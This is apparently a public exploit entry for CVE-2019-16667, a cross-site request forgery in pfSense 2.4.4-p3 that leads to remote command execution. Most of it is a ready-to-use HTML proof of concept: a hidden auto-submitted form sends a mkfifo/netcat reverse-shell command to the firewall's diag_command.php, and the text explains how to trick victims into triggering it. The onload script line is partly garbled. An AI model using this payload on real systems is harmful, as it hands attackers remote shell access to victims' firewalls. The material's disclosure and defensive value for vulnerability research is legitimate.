# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery  
# Date: 2019-09-27  
# Exploit Author: ghost_fh  
# Vendor Homepage:  
# Software Link:  
# Version: Till 2.4.4-p3  
# Tested on: freebsd  
# CVE : CVE-2019-16667  
# Vulnerability Description :- The pfsense firewall is vulnerable to RCE  
# chained with CSRF as it uses `csrf magic` library since it allows to tamper  
# the CSRF token values submitted when processing the form requests. Due to  
# this flaw, an attacker can exploit this vulnerability by crafting new page  
# that contains attacker's controlled input such as a "reverse shell" (eg:  
# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port  
# >/tmp/f`token value) in the form and entice the victims to click  
# on the crafted link via social engineering methods. Once the victim clicks  
# on the link (try again button in this case), the attacker can take the  
# lateral control of the victim's machine and malicious actions can be  
# performed on the victim's behalf.  
<!DOCTYPE html>  
<body onload="document.createElement('form')'myForm'))">  
<form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST">  
<input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|  
nc attacker_ip attacker_port >/tmp/f">  
<input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i  
2>&1|nc attacker_ip attacker_port >/tmp/f">  
<input type=hidden name="dlPath" value="">  
<input type=hidden name="txtPHPCommand" value="">  
<input type="hidden" name="submit" value="EXEC">  
# Create a malicious page containing the above values and once user clicks on malicious link,   
# he will be redirected to https://pfsense_ip/diag_command.php page.  
# Victim will be greeted with the "Try again" button.  
# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.